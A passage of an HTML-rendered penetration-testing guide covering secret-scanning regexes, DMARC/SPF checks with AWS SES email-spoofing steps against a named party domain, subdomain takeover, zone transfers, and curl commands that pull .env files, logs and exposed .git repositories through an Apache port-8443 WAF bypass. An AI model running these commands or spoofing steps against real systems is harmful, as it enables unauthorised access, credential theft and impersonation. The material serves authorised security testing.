&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MySQL URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;mysql://[^@\s]+@[^\s]+&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Redis URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;redis://[^@\s]*@[^\s]+&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;scan_for_secrets&lt;/span&gt;(text, source_name):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&amp;#34;Scans text for secrets using regex patterns.&amp;#34;&amp;#34;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; found &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; []
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name, pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; SECRET_PATTERNS&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;items():
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; matches &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;findall(pattern, text, re&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;IGNORECASE)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; m &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; matches:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db"&gt;isinstance&lt;/span&gt;(m, &lt;span style="color:#99d1db"&gt;tuple&lt;/span&gt;):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; m &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; m[&lt;span style="color:#ef9f76"&gt;0&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(m) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;6&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; found&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;append((name, m[:&lt;span style="color:#ef9f76"&gt;80&lt;/span&gt;]))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; found:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\n&lt;/span&gt;&lt;span style="color:#a6d189"&gt;📄 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;source_name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; name, secret &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; found:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34; 🔑 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;name&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;secret&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;return&lt;/span&gt; found
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="23-email-security--dmarc-spf-dkim" &gt;
&lt;div&gt;
&lt;a href="#23-email-security--dmarc-spf-dkim"&gt;
#
&lt;/a&gt;
23. EMAIL SECURITY — DMARC, SPF, DKIM
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="231-quick-check" &gt;
&lt;div&gt;
&lt;a href="#231-quick-check"&gt;
##
&lt;/a&gt;
23.1 Quick Check
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SPF&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short TXT &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt; | grep &lt;span style="color:#a6d189"&gt;&amp;#34;v=spf1&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DMARC&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short TXT _dmarc.&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DKIM (common selector: google)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short TXT google._domainkey.&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# MX&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;dig +short MX &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="232-interpreting-results" &gt;
&lt;div&gt;
&lt;a href="#232-interpreting-results"&gt;
##
&lt;/a&gt;
23.2 Interpreting Results
&lt;/div&gt;
&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Config&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;th&gt;Risk&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=spf1 ~all&lt;/code&gt; (softfail)&lt;/td&gt;
&lt;td&gt;SPF &amp;ldquo;suggests&amp;rdquo; blocking but doesn&amp;rsquo;t enforce&lt;/td&gt;
&lt;td&gt;Spoofed emails may pass&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=spf1 ?all&lt;/code&gt; (neutral)&lt;/td&gt;
&lt;td&gt;SPF does nothing&lt;/td&gt;
&lt;td&gt;Totally permissive&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=spf1 include:amazonses.com ~all&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;SES can send as the domain&lt;/td&gt;
&lt;td&gt;Any AWS SES account can spoof&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=DMARC1; p=none&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;DMARC disabled&lt;/td&gt;
&lt;td&gt;Zero spoofing protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=DMARC1; p=quarantine&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Failed emails go to spam&lt;/td&gt;
&lt;td&gt;Partial protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;v=DMARC1; p=reject&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Failed emails are rejected&lt;/td&gt;
&lt;td&gt;Full protection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;DKIM missing&lt;/td&gt;
&lt;td&gt;No cryptographic signature&lt;/td&gt;
&lt;td&gt;Email can be forged&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Political party — DMARC &lt;code&gt;p=none&lt;/code&gt; on both domains (&lt;code&gt;party.org.br&lt;/code&gt;, &lt;code&gt;party.com&lt;/code&gt;). SPF with &lt;code&gt;include:amazonses.com&lt;/code&gt; (any SES account can send as the domain). Total email spoofing.&lt;/p&gt;
&lt;h3 id="233-email-spoofing-via-aws-ses" &gt;
&lt;div&gt;
&lt;a href="#233-email-spoofing-via-aws-ses"&gt;
##
&lt;/a&gt;
23.3 Email Spoofing via AWS SES
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;With &lt;code&gt;v=spf1 include:amazonses.com ~all&lt;/code&gt;:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Create AWS account&lt;/li&gt;
&lt;li&gt;Configure SES with your own domain (verified)&lt;/li&gt;
&lt;li&gt;Send email with &lt;code&gt;From: presidente@partido.org.br&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;SPF PASSES (because of &lt;code&gt;include:amazonses.com&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;DKIM of own domain signs (or without DKIM)&lt;/li&gt;
&lt;li&gt;DMARC &lt;code&gt;p=none&lt;/code&gt; → provider delivers normally&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h2 id="24-subdomain-takeover--dns" &gt;
&lt;div&gt;
&lt;a href="#24-subdomain-takeover--dns"&gt;
#
&lt;/a&gt;
24. SUBDOMAIN TAKEOVER &amp;amp; DNS
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="241-subdomain-takeover-candidates" &gt;
&lt;div&gt;
&lt;a href="#241-subdomain-takeover-candidates"&gt;
##
&lt;/a&gt;
24.1 Subdomain Takeover Candidates
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Identify CNAMEs pointing to services that allow reclamation:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Vercel: cname.vercel-dns.com → check if project was deleted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# AWS S3: bucket.s3.amazonaws.com → check if bucket doesn&amp;#39;t exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# GitHub Pages: usuario.github.io → check if repo was deleted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Azure: cloudapp.azure.com → check if resource was removed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Zendesk: zendesk.com → check if helpdesk was removed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Shopify: myshopify.com → check if store was removed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Heroku: herokuapp.com → check if app was deleted&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Error fingerprint indicates potential takeover:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;NoSuchBucket&amp;#34; (S3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;There isn&amp;#39;t a GitHub Pages site here&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;404 — There isn&amp;#39;t a page at this address&amp;#34; (Vercel)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;Domain is not configured&amp;#34; (Azure)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="242-dns-zone-transfer" &gt;
&lt;div&gt;
&lt;a href="#242-dns-zone-transfer"&gt;
##
&lt;/a&gt;
24.2 DNS Zone Transfer
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Try zone transfer (rare, but devastating if it works)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; ns in &lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;host -t ns &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt; | cut -d&lt;span style="color:#a6d189"&gt;&amp;#34; &amp;#34;&lt;/span&gt; -f4&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;=== &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ns&lt;/span&gt;&lt;span style="color:#a6d189"&gt; ===&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dig axfr @&lt;span style="color:#f2d5cf"&gt;$ns&lt;/span&gt; &lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="243-tls-certificates--more-subdomains" &gt;
&lt;div&gt;
&lt;a href="#243-tls-certificates--more-subdomains"&gt;
##
&lt;/a&gt;
24.3 TLS Certificates — More Subdomains
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# crt.sh (free, no rate limit)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://crt.sh/?q=%25.&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$target&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;amp;output=json&amp;#34;&lt;/span&gt; | jq -r &lt;span style="color:#a6d189"&gt;&amp;#39;.[].name_value&amp;#39;&lt;/span&gt; | sort -u
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SecurityTrails (requires API key)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# DNSDB (requires account)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Censys (requires account)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="25-advanced-field-techniques" &gt;
&lt;div&gt;
&lt;a href="#25-advanced-field-techniques"&gt;
#
&lt;/a&gt;
25. ADVANCED FIELD TECHNIQUES
&lt;/div&gt;
&lt;/h2&gt;
&lt;p&gt;These techniques were discovered and validated in real pentests against 100+ targets.&lt;/p&gt;
&lt;h3 id="251-apache-port-8443--nginxwaf-bypass" &gt;
&lt;div&gt;
&lt;a href="#251-apache-port-8443--nginxwaf-bypass"&gt;
##
&lt;/a&gt;
25.1 Apache Port 8443 — nginx/WAF Bypass
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When a server has nginx on port 443 + Apache on port 8443, Apache is often more permissively configured, bypassing all nginx protections.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 1. Detect Apache on 8443&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -skI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/&amp;#34;&lt;/span&gt; | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;server:&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Server: Apache/2.4.29 (Ubuntu)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 2. Check if TRACE is enabled (XST — Cross-Site Tracing)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -X TRACE &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/&amp;#34;&lt;/span&gt; -D -
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# HTTP/1.1 200 OK — echoes ALL headers including cookies!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 3. Access the framework entry point directly&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/public/index.php&amp;#34;&lt;/span&gt; -D - | grep -i &lt;span style="color:#a6d189"&gt;&amp;#34;set-cookie&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Sets XSRF-TOKEN and session cookies → confirms PHP/FastCGI processing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 4. Check catch-all vhost (accepts any Host header)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk -H &lt;span style="color:#a6d189"&gt;&amp;#34;Host: naoexiste9999.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/&amp;#34;&lt;/span&gt; -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If 200 → catch-all vhost — serves content for any domain&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 5. Test sensitive files that nginx blocks but Apache serves&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/.env&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/storage/logs/laravel.log&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sk &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET_IP:8443/icons/README&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Apache default&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case (CRITICAL)&lt;/strong&gt;: Fitness tech company — Apache 2.4.29 on port 8443 with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;TRACE enabled (echoed HttpOnly cookies)&lt;/li&gt;
&lt;li&gt;Catch-all vhost (any Host header = 200)&lt;/li&gt;
&lt;li&gt;Direct access to Laravel &lt;code&gt;public/index.php&lt;/code&gt; (set session cookies)&lt;/li&gt;
&lt;li&gt;nginx on port 443 blocked everything — Apache 8443 served everything&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="252-git-exposure--beyond-gitconfig" &gt;
&lt;div&gt;
&lt;a href="#252-git-exposure--beyond-gitconfig"&gt;
##
&lt;/a&gt;
25.2 Git Exposure — Beyond &lt;code&gt;.git/config&lt;/code&gt;
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/HEAD reveals current branch&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/HEAD&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/packed-refs reveals ALL branches (including inactive ones)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/packed-refs&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/logs/HEAD reveals committer email&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/logs/HEAD&amp;#34;&lt;/span&gt; | grep -oP &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;lt;[^&amp;gt;]+&amp;gt;&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .git/index (233KB+) — lists ALL tracked files&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET/.git/index&amp;#34;&lt;/span&gt; | strings | grep -E &lt;span style="color:#a6d189"&gt;&amp;#39;\.php$|\.env$|\.yml$|\.json$&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract files from .git with git-dumper&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://github.com/arthaud/git-dumper&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;./git_dumper.py http://TARGET/.git/ /tmp/repo/
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="253-mysql--ftp-banner-with-pure-bash-no-nmap" &gt;
&lt;div&gt;
&lt;a href="#253-mysql--ftp-banner-with-pure-bash-no-nmap"&gt;
##
&lt;/a&gt;
25.3 MySQL / FTP Banner with Pure Bash (no nmap)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# MySQL — banner without mysql client&lt;/span&gt;
